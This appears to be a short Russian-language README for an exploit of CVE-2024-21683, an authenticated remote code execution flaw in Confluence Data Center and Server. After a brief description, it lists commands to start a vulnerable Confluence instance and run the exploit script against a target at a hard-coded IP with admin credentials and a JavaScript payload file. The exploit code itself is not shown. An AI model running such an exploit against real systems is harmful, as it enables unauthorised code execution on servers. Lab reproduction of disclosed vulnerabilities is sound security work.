21 мая 2024 года была зарегистрирована уязвимость в Confluence Data Center and Server, получившая номер CVE-2024-21683, а также высокий балл 8.3 по метрике CVSS.
Данная уязвимость позволяет авторизованному пользователю с наличием глобального права доступа System Administrator осуществить выполнение произвольного кода.
# Переход в директорию для запуска сервиса
cd confluence
# Копирование переменных окружения
cp .env.example .env
# Запуск проекта
make run
# Переход в корень рабочей директории
cd ..
# Загрузка зависимостей
poetry install
# Запуск экслойта
poetry run python3 CVE-2024-21683.py -t http://84.201.163.5:8090 -u admin -p HardP@ssw0rd\! -f ./exp.js